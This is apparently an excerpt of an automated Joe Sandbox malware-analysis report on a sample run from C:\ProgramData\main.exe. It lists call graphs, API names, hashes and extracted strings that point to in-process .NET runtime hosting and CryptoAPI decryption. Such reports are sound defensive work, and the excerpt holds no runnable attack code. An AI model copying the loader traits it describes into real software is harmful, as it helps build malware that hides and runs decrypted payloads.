106205 7ffdf7ca18ac 106183->106205 106184 7ffdf7ca1685 __scrt_release_startup_lock 106217 7ffdf7ca1b84 8 API calls 2 library calls 106184->106217 106188 7ffdf7ca155d _RTC_Initialize 106188->106193 106208 7ffdf7ca1c00 106188->106208 106192 7ffdf7ca1577 106194 7ffdf7ca1c00 35 API calls 106192->106194 106193->106156 106195 7ffdf7ca1583 __scrt_initialize_default_local_stdio_options 106194->106195 106195->106193 106196 7ffdf7ca159f __scrt_dllmain_after_initialize_c 106195->106196 106196->106193 106197->106155 106198->106160 106200 7ffdf7ca19ce __isa_available_init 106199->106200 106218 7ffdf7ca2864 106200->106218 106202 7ffdf7ca19d3 106203 7ffdf7ca19d7 106202->106203 106226 7ffdf7ca28c0 8 API calls 3 library calls 106202->106226 106203->106181 106251 7ffdf7ca19f8 106205->106251 106207 7ffdf7ca18b7 106207->106188 106257 7ffdf7ca1bb0 106208->106257 106210 7ffdf7ca1572 106211 7ffdf7ca1cc4 InitializeSListHead 106210->106211 106212->106171 106213->106183 106214->106176 106215->106180 106216->106184 106217->106172 106219 7ffdf7ca286d __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 106218->106219 106227 7ffdf7ca2cd0 106219->106227 106222 7ffdf7ca287b 106222->106202 106224 7ffdf7ca2884 106224->106222 106234 7ffdf7ca2d18 DeleteCriticalSection 106224->106234 106226->106203 106228 7ffdf7ca2cd8 106227->106228 106230 7ffdf7ca2d09 106228->106230 106231 7ffdf7ca2877 106228->106231 106235 7ffdf7ca307c 106228->106235 106240 7ffdf7ca2d18 DeleteCriticalSection 106230->106240 106231->106222 106233 7ffdf7ca2c6c 8 API calls 3 library calls 106231->106233 106233->106224 106234->106222 106241 7ffdf7ca2d50 106235->106241 106238 7ffdf7ca30d3 InitializeCriticalSectionAndSpinCount 106239 7ffdf7ca30bf 106238->106239 106239->106228 106240->106231 106242 7ffdf7ca2db6 106241->106242 106247 7ffdf7ca2db1 106241->106247 106242->106238 106242->106239 106243 7ffdf7ca2e7e 106243->106242 106246 7ffdf7ca2e8d GetProcAddress 106243->106246 106244 7ffdf7ca2de9 LoadLibraryExW 106245 7ffdf7ca2e0f GetLastError 106244->106245 106244->106247 106245->106247 106248 7ffdf7ca2e1a LoadLibraryExW 106245->106248 106246->106242 106249 7ffdf7ca2ea5 106246->106249 106247->106242 106247->106243 106247->106244 106250 7ffdf7ca2e5c FreeLibrary 106247->106250 106248->106247 106249->106242 106250->106247 106252 7ffdf7ca1ab6 106251->106252 106255 7ffdf7ca1a10 __scrt_initialize_onexit_tables __scrt_release_startup_lock 106251->106255 106256 7ffdf7ca1d14 7 API calls __scrt_fastfail 106252->106256 106254 7ffdf7ca1ac0 106255->106207 106256->106254 106258 7ffdf7ca1bdf 106257->106258 106260 7ffdf7ca1bd5 _onexit 106257->106260 106261 7ffdf7cac6a8 35 API calls _onexit 106258->106261 106260->106210 106261->106260

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 7ffdf7ca14b0-7ffdf7ca14b6 1 7ffdf7ca14b8-7ffdf7ca14bb 0->1 2 7ffdf7ca14f1-7ffdf7ca1648 0->2 4 7ffdf7ca14e5-7ffdf7ca1524 call 7ffdf7ca19ac 1->4 5 7ffdf7ca14bd-7ffdf7ca14c0 1->5 6 7ffdf7ca164a-7ffdf7ca164c 2->6 7 7ffdf7ca164e-7ffdf7ca1669 call 7ffdf7ca183c 2->7 22 7ffdf7ca1526-7ffdf7ca1528 4->22 23 7ffdf7ca152d-7ffdf7ca1542 call 7ffdf7ca183c 4->23 9 7ffdf7ca14d8 __scrt_dllmain_crt_thread_attach 5->9 10 7ffdf7ca14c2-7ffdf7ca14c5 5->10 12 7ffdf7ca169e-7ffdf7ca16ad 6->12 20 7ffdf7ca1675-7ffdf7ca169c call 7ffdf7ca1968 call 7ffdf7ca1998 call 7ffdf7ca1b60 call 7ffdf7ca1b84 7->20 21 7ffdf7ca166b-7ffdf7ca1670 call 7ffdf7ca1d14 7->21 11 7ffdf7ca14dd-7ffdf7ca14e4 9->11 15 7ffdf7ca14c7-7ffdf7ca14d0 10->15 16 7ffdf7ca14d1-7ffdf7ca14d6 call 7ffdf7ca18ec 10->16 16->11 20->12 21->20 27 7ffdf7ca1615-7ffdf7ca162a 22->27 32 7ffdf7ca154e-7ffdf7ca155f call 7ffdf7ca18ac 23->32 33 7ffdf7ca1544-7ffdf7ca1549 call 7ffdf7ca1d14 23->33 40 7ffdf7ca15c8-7ffdf7ca15d2 call 7ffdf7ca1b60 32->40 41 7ffdf7ca1561-7ffdf7ca159d call 7ffdf7ca1e5c call 7ffdf7ca1c00 call 7ffdf7ca1cc4 call 7ffdf7ca1c00 call 7ffdf7ca1ce8 call 7ffdf7cab738 32->41 33->32 40->22 49 7ffdf7ca15d8-7ffdf7ca15e4 call 7ffdf7ca1d04 40->49 41->40 68 7ffdf7ca159f-7ffdf7ca15a6 __scrt_dllmain_after_initialize_c 41->68 55 7ffdf7ca15e6-7ffdf7ca15f0 call 7ffdf7ca1ac4 49->55 56 7ffdf7ca160a-7ffdf7ca1610 49->56 55->56 62 7ffdf7ca15f2-7ffdf7ca1605 call 7ffdf7ca1ef4 55->62 56->27 62->56 68->40 69 7ffdf7ca15a8-7ffdf7ca15c5 call 7ffdf7cab6c0 68->69 69->40
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3885183344-0
                                                                                                                                          • Opcode ID: 60ad72148b91878e3b16153315e761f2c720640e19d9d84f5d982d22fe093547
                                                                                                                                          • Instruction ID: eaca5539177abb081a8c643a413161becd85018e304948d09341fe3a94ce7e93
                                                                                                                                          • Opcode Fuzzy Hash: 60ad72148b91878e3b16153315e761f2c720640e19d9d84f5d982d22fe093547
                                                                                                                                          • Instruction Fuzzy Hash: 2F51792DF0C64387FB50AB65B471AFD22B1AF45B86F484036E92E4A2DEDE2DE5458300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                          • String ID: C:\ProgramData\main.exe
                                                                                                                                          • API String ID: 3307058713-2906359932
                                                                                                                                          • Opcode ID: 2dc5aa01033fe98f58406d78ba0122ad67fcd156f15ecddb341347428d3e1105
                                                                                                                                          • Instruction ID: f29cfec91523359977f5f92d6a65b66af49a299e597d9412b22878734755a3d0
                                                                                                                                          • Opcode Fuzzy Hash: 2dc5aa01033fe98f58406d78ba0122ad67fcd156f15ecddb341347428d3e1105
                                                                                                                                          • Instruction Fuzzy Hash: 4F419C3AF08B4286F7149F26A8708FC6794EB54B95B544032EA5E4BBC9DE3DE4918340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1777501143.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b8a0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: 640a3fc4414044533d390303687f087550c8eb3afa2a5a6188330374c6d5d605
                                                                                                                                          • Instruction ID: 34e8b00b1d91ced1e1913211579ac9590779cd2663eeb0d20f39476f53ac1b76
                                                                                                                                          • Opcode Fuzzy Hash: 640a3fc4414044533d390303687f087550c8eb3afa2a5a6188330374c6d5d605
                                                                                                                                          • Instruction Fuzzy Hash: F931F53090CB4C4FDB2DEB989855AF97BE0EF5A321F04416FD05AD3692DB64A806C791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1777501143.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b8a0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorMode
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                          • Opcode ID: 3da3e5ccfa57cc1e5b24f06fbb40acd147db6c57c1d5764d7023e5529652047b
                                                                                                                                          • Instruction ID: 4ab97ca6fa52f677c53039fdcd33f10feb62544a0e34549f65e335aa04168c25
                                                                                                                                          • Opcode Fuzzy Hash: 3da3e5ccfa57cc1e5b24f06fbb40acd147db6c57c1d5764d7023e5529652047b
                                                                                                                                          • Instruction Fuzzy Hash: 9921F130A0CA4C9FDB18DB98D849BE9BBE0FF59320F00426FD059D3652CB616816CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779292235.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6898c8251c7cd948f8b9e628918dcf71b1df1e4ca4ea3875f82d4ebb90e89f34
                                                                                                                                          • Instruction ID: 2850c9c367df5bba24848caa9d12ffae0d328ff57909199541618144df717a7e
                                                                                                                                          • Opcode Fuzzy Hash: 6898c8251c7cd948f8b9e628918dcf71b1df1e4ca4ea3875f82d4ebb90e89f34
                                                                                                                                          • Instruction Fuzzy Hash: CAE0862471FBC51FF7565378187A4AD2BF05F0A60075904F9D49ACB2F3D8091C068315
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugOutputString$HandleModule$AddressErrorLastProc
                                                                                                                                          • String ID: CLR creation not implemented.$CLRCreateInstance$CorBindToRuntimeEx failure.$CorBindToRuntimeEx success.$CoreCLR$GetCLRRuntimeHost$ICLRRuntimeHost query success.$ICLRRuntimeHost2 start failure.$ICLRRuntimeHost2 start success.$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$MSCorEE$VerifyClrIsLoaded$could not create ICLRMetaHost.$could not get ICLRRuntimeHost.$could not get ICLRRuntimeHost2.$could not get ICLRRuntimeInfo.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$missing CLR function.$missing CLR module in process.$missing CoreCLR function.$v4.0.30319
                                                                                                                                          • API String ID: 1586866300-1257904583
                                                                                                                                          • Opcode ID: 4ec0c0398ac7ce2331cb7ed59b90b72d89657f33e81e4197c3f9a5aca80761e1
                                                                                                                                          • Instruction ID: d7a1b1b716ad42ce83f5b8d304836b1349bf0e25b93e086ba4c9b835b9a19a4f
                                                                                                                                          • Opcode Fuzzy Hash: 4ec0c0398ac7ce2331cb7ed59b90b72d89657f33e81e4197c3f9a5aca80761e1
                                                                                                                                          • Instruction Fuzzy Hash: 0DA1FC29B18A93D2EB10CB15F8609FD23A5FB94B44F900536D96E836E8EF7DE509C710
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Crypt$Hash$ContextDestroyEnvironmentVariablelstrcatlstrlen$AcquireCreateCurrentDataDecryptDeriveProcessReleaselstrcmpwsprintf
                                                                                                                                          • String ID: Harpy SDK v1.12 License Ticket for Process %lu$HarpyLicenseTicket$HarpyTicketId$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                          • API String ID: 180405519-3523284812
                                                                                                                                          • Opcode ID: 59fd010b720426ec454b560ab24bcf33cd7d436fe01766645c68b9a388f43452
                                                                                                                                          • Instruction ID: 7f5bffd6fc206d9df0e45257cebda563eb7bfcb965d1c4ba058f1c27f2ac51c7
                                                                                                                                          • Opcode Fuzzy Hash: 59fd010b720426ec454b560ab24bcf33cd7d436fe01766645c68b9a388f43452
                                                                                                                                          • Instruction Fuzzy Hash: B791C336B18AC286EB20CF25E860BEE77A5FB84B44F454135DA9D83A98DF3DD545CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Crypt$DestroyHash$CreateErrorLast
                                                                                                                                          • String ID: CryptCreateHash failed, code=%lu$CryptDecrypt failed, code=%lu$CryptDeriveKey failed, code=%lu$CryptEncrypt failed, code=%lu$CryptHashData failed, code=%lu$missing encryption context
                                                                                                                                          • API String ID: 527577405-1659892492
                                                                                                                                          • Opcode ID: f621d88533870f120e8a6cccc19ccf059e6a61c6b4015c72dd28b68b742656bd
                                                                                                                                          • Instruction ID: 28aeb8fd85f44945ffa7da21ad82830f45c1b59345bdf19e743d6bcc3f34dfa8
                                                                                                                                          • Opcode Fuzzy Hash: f621d88533870f120e8a6cccc19ccf059e6a61c6b4015c72dd28b68b742656bd
                                                                                                                                          • Instruction Fuzzy Hash: 49718029B08A82C5EB609B15A824AEE7360FB85BA4F504331EABE476D9DF3CD055C701
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                          • String ID: -$:$:$?
                                                                                                                                          • API String ID: 3440502458-92861585
                                                                                                                                          • Opcode ID: 4a925456571545faeec39bf93db72bcfde35aeeef74853eb9e954ebb019d3eb5
                                                                                                                                          • Instruction ID: 1530e5f81133d530b6b083d1ca55501ae8ff44ae067f88ac24781cfb5e5ad12a
                                                                                                                                          • Opcode Fuzzy Hash: 4a925456571545faeec39bf93db72bcfde35aeeef74853eb9e954ebb019d3eb5
                                                                                                                                          • Instruction Fuzzy Hash: CBE1C03AF0868286F7609F319871EED2B91FB84785F444135EA6E4AADDDF3CE8418700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ContextCrypt$Release$AcquireErrorLast
                                                                                                                                          • String ID: CryptAcquireContext failed, code=%lu$Microsoft Enhanced Cryptographic Provider v1.0$cryptoapi_decrypt$cryptoapi_encrypt
                                                                                                                                          • API String ID: 972235000-3603160501
                                                                                                                                          • Opcode ID: d0c24ebadf50ff1acfba59b77752d8c21c86bee9cca92e9d2ac9f2c1c9361824
                                                                                                                                          • Instruction ID: 374dadf0ec25db2baa877e4db409862ca07e101cc8073bb05d8be021bd55abfb
                                                                                                                                          • Opcode Fuzzy Hash: d0c24ebadf50ff1acfba59b77752d8c21c86bee9cca92e9d2ac9f2c1c9361824
                                                                                                                                          • Instruction Fuzzy Hash: 2A515E3A708B8285E7608F25E8A0AE973A5FB84784F444134EA9D53BD9DF3CE4A5D740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1405656091-0
                                                                                                                                          • Opcode ID: b75992c2d31baf2fd2c7c1c732db52317cfa45f83435a5c5a64d9592f2474f38
                                                                                                                                          • Instruction ID: ea05203de62a4af93571aeb1d45048fb162a3c4e417bb7da6154eeca4143dff5
                                                                                                                                          • Opcode Fuzzy Hash: b75992c2d31baf2fd2c7c1c732db52317cfa45f83435a5c5a64d9592f2474f38
                                                                                                                                          • Instruction Fuzzy Hash: 2181AFB6F046468BFB589F29C971BED2691EB54789F448039DA1D8EACDEF3CE5008740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                          • Opcode ID: 7882c181e7089931faa2f74e932d1e474fa724ceef338d6565d2e8bf58ac212a
                                                                                                                                          • Instruction ID: 67ede7757becb3f9c4e10d3461800679765fb59b20569eb05e17b490ec83359f
                                                                                                                                          • Opcode Fuzzy Hash: 7882c181e7089931faa2f74e932d1e474fa724ceef338d6565d2e8bf58ac212a
                                                                                                                                          • Instruction Fuzzy Hash: 4C31713AB08F8186EB208F24E8646ED33A0FB88B59F540135EA9D47B9DDF3CC1458B00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF116F
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1188
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: GetProcAddress.KERNEL32 ref: 00007FFDF7CF1198
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF13A3
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF142E
                                                                                                                                          • OutputDebugStringA.KERNEL32 ref: 00007FFDF7CECE02
                                                                                                                                          • OutputDebugStringA.KERNEL32 ref: 00007FFDF7CECE34
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0268
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0A7F
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: HeapFree.KERNEL32 ref: 00007FFDF7CF0ACE
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0B10
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
